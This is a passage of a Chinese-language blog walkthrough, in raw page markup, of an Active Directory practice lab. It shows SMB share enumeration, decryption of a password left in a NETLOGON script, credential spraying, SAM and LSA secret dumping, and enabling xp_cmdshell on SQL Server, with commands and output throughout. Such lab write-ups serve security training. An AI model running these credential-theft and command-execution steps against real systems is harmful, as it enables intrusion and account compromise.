class=\"wp-block-paragraph\"><a><\/a>\u7528\u767b\u9646\u8fc7\u53bb\u51ed\u8bc1\u8fdb\u884c\u679a\u4e3e<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-85.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"263\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-85.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2142\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>CASTELBLACK public READ,WRITE<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>CASTELBLACK all READ,WRITE<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>WINTERFELL NETLOGON READ<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>WINTERFELL SYSVOL READ<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u539f\u6765\u7684public\u53ef\u4ee5\u8bfb\u5199\u4e86\uff0c\u8fdb\u4e00\u6b65\u8bfb\u53d6public\u91cc\u7684\u5185\u5bb9<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>smbclient \/\/192.168.56.22\/public \\<\/li>\n\n\n\n<li><a><\/a>&nbsp;-U &#8216;north.sevenkingdoms.local\/arya.stark%Needle&#8217; \\<\/li>\n\n\n\n<li><a><\/a>&nbsp;-c &#8216;recurse; ls&#8217;<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u518d\u770ball<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-87.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"848\" height=\"373\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-87.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2144\"  sizes=\"auto, (max-width: 848px) 100vw, 848px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u867d\u7136public\u80fd\u8bbf\u95ee\uff0c\u4f46\u662f\u662f\u7a7a\u7684\uff0call\u91cc\u4e5f\u6ca1\u6709\u65b0\u4e1c\u897f<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u8bfb\u53d6 NETLOGON \u4e0e SYSVOL<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u8f7d NETLOGON \u548c SYSVOL<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>smbclient \/\/192.168.56.11\/NETLOGON \\<br>&nbsp;&nbsp;-U 'north.sevenkingdoms.local\/arya.stark%Needle' \\<br>&nbsp;&nbsp;-c 'recurse; ls'<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>smbclient \/\/192.168.56.11\/SYSVOL \\<br>&nbsp;&nbsp;-U 'north.sevenkingdoms.local\/arya.stark%Needle' \\<br>&nbsp;&nbsp;-c 'recurse; ls'<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>\u250c\u2500\u2500(root\u327fkali)-[~]<\/li>\n\n\n\n<li><a><\/a>\u2514\u2500# smbclient \/\/192.168.56.11\/NETLOGON \\<\/li>\n\n\n\n<li><a><\/a>&gt; -U &#8216;north.sevenkingdoms.local\/arya.stark%Needle&#8217; \\<\/li>\n\n\n\n<li><a><\/a>&gt; -c &#8216;recurse; ls&#8217;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>&nbsp;. D 0 Sun May 31 11:47:39 2026<\/li>\n\n\n\n<li><a><\/a>&nbsp;.. D 0 Sun May 31 11:47:39 2026<\/li>\n\n\n\n<li><a><\/a>&nbsp;script.ps1 A 165 Sun May 31 11:47:35 2026<\/li>\n\n\n\n<li><a><\/a>&nbsp;secret.ps1 A 869 Sun May 31 11:47:38 2026<\/li>\n\n\n\n<li><a><\/a><a><\/a>&nbsp;15638527 blocks of size 4096. 11399309 blocks available<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>\u250c\u2500\u2500(root\u327fkali)-[~]<\/li>\n\n\n\n<li><a><\/a>\u2514\u2500# smbclient \/\/192.168.56.11\/SYSVOL \\<\/li>\n\n\n\n<li><a><\/a>&gt; -U &#8216;north.sevenkingdoms.local\/arya.stark%Needle&#8217; \\<\/li>\n\n\n\n<li><a><\/a>&gt; -c &#8216;recurse; ls&#8217;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>&nbsp;. D 0 Sun May 31 10:39:17 2026<\/li>\n\n\n\n<li><a><\/a>&nbsp;.. D 0 Sun May 31 10:39:17 2026<\/li>\n\n\n\n<li><a><\/a>&nbsp;north.sevenkingdoms.local Dr 0 Sun May 31 10:39:17 2026<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>NETLOGON \u91cc\u6709\u4e24\u4e2a\u811a\u672c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>script.ps1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>secret.ps1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4e0b\u8f7d\u4e0b\u6765<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>mkdir -p winterfell-netlogon<br><br>smbclient \/\/192.168.56.11\/NETLOGON \\<br>&nbsp;&nbsp;-U 'north.sevenkingdoms.local\/arya.stark%Needle' \\<br>&nbsp;&nbsp;-c 'lcd winterfell-netlogon; get script.ps1; get secret.ps1'<br><br>cat winterfell-netlogon\/script.ps1<br>cat winterfell-netlogon\/secret.ps1<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>\u250c\u2500\u2500(root\u327fkali)-[~]<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u2514\u2500# cat winterfell-netlogon\/script.ps1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># fake script in netlogon with creds<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$task = &#8216;\/c TODO&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$taskName = &#8220;fake task&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$user = &#8220;NORTH\\jeor.mormont&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$password = &#8220;_L0ngCl@w_&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a># passwords in sysvol still &#8230;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u250c\u2500\u2500(root\u327fkali)-[~]<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u2514\u2500# cat winterfell-netlogon\/secret.ps1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># cypher script<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># $domain=&#8221;sevenkingdoms.local&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># $EncryptionKeyBytes = New-Object Byte[] 32<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># $EncryptionKeyBytes | Out-File &#8220;encryption.key&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># $EncryptionKeyData = Get-Content &#8220;encryption.key&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a># Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath &#8220;secret.encrypted&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a># secret stored :<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$secret=&#8221;76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA=&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a># T.L.<\/p>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-88.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"278\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-88.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2145\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u811a\u672c\u6cc4\u9732\u4e0e secret.ps1 \u89e3\u5bc6<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">script.ps1\u66b4\u9732\u4e86\u8d26\u5bc6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$user = &#8220;NORTH\\jeor.mormont&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>$password = &#8220;_L0ngCl@w_&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>secret.ps1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>secret.ps1 \u662f\u53e6\u4e00\u4e2a\u6cc4\u9732\u3002\u5b83\u4e0d\u662f\u660e\u6587\uff0c\u800c\u662f PowerShell \u7684 SecureString \u52a0\u5bc6\u7ed3\u679c\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6ce8\u91ca\u91cc\u5df2\u7ecf\u8bf4\u660e\u5b83\u600e\u4e48\u6765\u7684\uff1aConvertFrom-SecureString -Key \u7528\u7684\u662f\u4e00\u4e2a\u81ea\u5b9a\u4e49 AES key\u3002\u73b0\u5728 $secret \u662f\u5bc6\u6587\uff0c$keyData \u662f\u5bc6\u94a5\uff0c\u800c\u4e14\u4e24\u4e2a\u90fd\u653e\u5728\u540c\u4e00\u4e2a\u6587\u4ef6\u91cc\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u89e3\u5bc6\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728powershell\u4e2d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>$keyData = &#91;byte&#91;]](177,252,228,64,28,91,12,201,20,91,21,139,255,65,9,247,41,55,164,28,75,132,143,71,62,191,211,61,154,61,216,91)<br><br>$secret = \"76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA=\"<br><br>$secure = ConvertTo-SecureString -String $secret -Key $keyData<br>$ptr = &#91;Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)<br><br>try {<br>&nbsp;&nbsp;&nbsp;&nbsp;&#91;Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr)<br>}<br>finally {<br>&nbsp;&nbsp;&nbsp;&nbsp;&#91;Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr)<br>}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8f93\u51fa\uff1apowerkingftw135<\/p>\n\n\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u76ee\u6d4b\u662f\u4e2a\u5bc6\u7801powerkingftw135\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u662f\u54ea\u4e2a\u8d26\u6237\u7684 \u672b\u5c3e\u6709\u4e2a#T.L.\u53ef\u80fd\u662f\u7ebf\u7d22<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u5229\u7528 jeor.mormont \u6a2a\u5411\u9a8c\u8bc1<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528script.ps1\u51ed\u8bc1\u8fdb\u884c\u55b7\u6d12<\/p>\n\n\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.10 445 KINGSLANDING [+] north.sevenkingdoms.local\\jeor.mormont:_L0ngCl@w_<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\\jeor.mormont:_L0ngCl@w_<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\\jeor.mormont:_L0ngCl@w_ (Pwn3d!)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>(Pwn3d!)\u8868\u793a\u5728192.168.56.22\u4e0a\u662f\u7ba1\u7406\u5458\u6743\u9650<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u672c\u5730\u7ba1\u7406\u5458\u540e\u7684\u51ed\u636e\u63d0\u53d6<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">nxc smb 192.168.56.22 \\<br>&nbsp;&nbsp;-d north.sevenkingdoms.local \\<br>&nbsp;&nbsp;-u &#8216;jeor.mormont&#8217; -p &#8216;_L0ngCl@w_&#8217; \\<br>&nbsp;&nbsp;&#8211;loggedon-users<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u67e5\u770b\u5f53\u524d\u767b\u5f55\u7684\u7528\u6237<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\\jeor.mormont:_L0ngCl@w_ (Pwn3d!)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK NORTH\\CASTELBLACK$ logon_server:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK NORTH\\robb.stark logon_server: WINTERFELL<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK NORTH\\sql_svc logon_server: WINTERFELL<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>robb.stark\u548csql_svc\u5728\u7ebf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u679a\u4e3e\u57df\u7528\u6237\uff0c\u67e5\u627e\u4e0e #T.L. \u7ebf\u7d22\u5bf9\u5e94\u7684\u5019\u9009\u7528\u6237\u540d\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-89.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"275\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-89.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2146\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd9\u91cc\u8fd8\u6cc4\u9732\u51fa\u4e00\u4e2a samwell.tarly \/ Heartsbane \u7ec4\u5408\uff0c\u5148\u8bb0\u4e0b\u6765\uff0c\u540e\u9762\u53ef\u4ee5\u7528\u4e8e\u8fdb\u4e00\u6b65\u9a8c\u8bc1\u548c\u6a2a\u5411\u679a\u4e3e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc smb 192.168.56.22 \\<br>&nbsp;&nbsp;-d north.sevenkingdoms.local \\<br>&nbsp;&nbsp;-u &#8216;jeor.mormont&#8217; -p &#8216;_L0ngCl@w_&#8217; \\<br>&nbsp;&nbsp;&#8211;sam<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8bfb\u53d6\u8fd9\u4e2a192.168.56.22\u7684SAM\u6570\u636e\u5e93<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc smb 192.168.56.22 \\<br>&nbsp;&nbsp;-d north.sevenkingdoms.local \\<br>&nbsp;&nbsp;-u &#8216;jeor.mormont&#8217; -p &#8216;_L0ngCl@w_&#8217; \\<br>&nbsp;&nbsp;&#8211;lsa<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8bfb\u53d6192.168.56.22\u7684LSA secrets\uff0c\u53ef\u80fd\u4f1a\u5305\u542b\u660e\u6587\u8d26\u5bc6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-91.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"416\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-91.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2148\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728 north.sevenkingdoms.local \u57df\u5185\u66b4\u9732\u4e86\u6570\u636e\u5e93\u670d\u52a1\u8d26\u53f7 sql_svc \u7684\u5bc6\u7801\uff1aYouWillNotKerboroast1ngMeeeeee\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-90.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"404\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-90.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2147\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>MSSQL \u4e0e\u670d\u52a1\u8d26\u53f7 sql_svc<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u9a8c\u8bc1\u5b83\u5728\u4e09\u53f0 SMB \u4e0a\u7684\u6743\u9650\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \\-d north.sevenkingdoms.local \\-u &#8216;sql_svc&#8217; -p &#8216;YouWillNotKerboroast1ngMeeeeee&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7136\u540e\u6d4b MSSQL \u767b\u5f55\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc mssql 192.168.56.22 \\-d north.sevenkingdoms.local \\-u &#8216;sql_svc&#8217; -p &#8216;YouWillNotKerboroast1ngMeeeeee&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u63a5\u7740\u67e5\u5b83\u5728 SQL Server \u91cc\u7684\u6743\u9650\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc mssql 192.168.56.22 \\-d north.sevenkingdoms.local \\-u &#8216;sql_svc&#8217; -p &#8216;YouWillNotKerboroast1ngMeeeeee&#8217; \\-q &#8220;SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(&#8216;sysadmin&#8217;);&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>\u6700\u540e\u4e00\u6761SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(&#8216;sysadmin&#8217;);<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8f93\u51fa\u7684\u662f1\uff0c\u8bf4\u660esql_svc\u662fSQL Server\u7684sysadmin<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-92.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"431\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-92.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2149\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4e0b\u4e00\u6b65\u542f\u7528\u5e76\u6d4b\u8bd5 xp_cmdshell\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc mssql 192.168.56.22 \\-d north.sevenkingdoms.local \\-u &#8216;sql_svc&#8217; -p &#8216;YouWillNotKerboroast1ngMeeeeee&#8217; \\-q &#8220;EXEC sp_configure &#8216;show advanced options&#8217;,1; RECONFIGURE; EXEC sp_configure &#8216;xp_cmdshell&#8217;,1; RECONFIGURE;&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7136\u540e\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u786e\u8ba4 SQL \u547d\u4ee4\u6267\u884c\u8eab\u4efd\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc mssql 192.168.56.22 \\-d north.sevenkingdoms.local \\-u &#8216;sql_svc&#8217; -p &#8216;YouWillNotKerboroast1ngMeeeeee&#8217; \\-x &#8216;whoami &amp;&amp; hostname&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u518d\u770b\u6743\u9650\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc mssql 192.168.56.22 \\-d north.sevenkingdoms.local \\-u &#8216;sql_svc&#8217; -p &#8216;YouWillNotKerboroast1ngMeeeeee&#8217; \\-x &#8216;whoami \/priv&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>\u901a\u8fc7 xp_cmdshell \u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u65f6\uff0c\u5f53\u524d\u8eab\u4efd\u662f north\\sql_svc\uff0c\u4e14\u8be5\u8d26\u53f7\u5177\u5907 SeImpersonatePrivilege\u3002<\/p>\n\n\n\n<h2 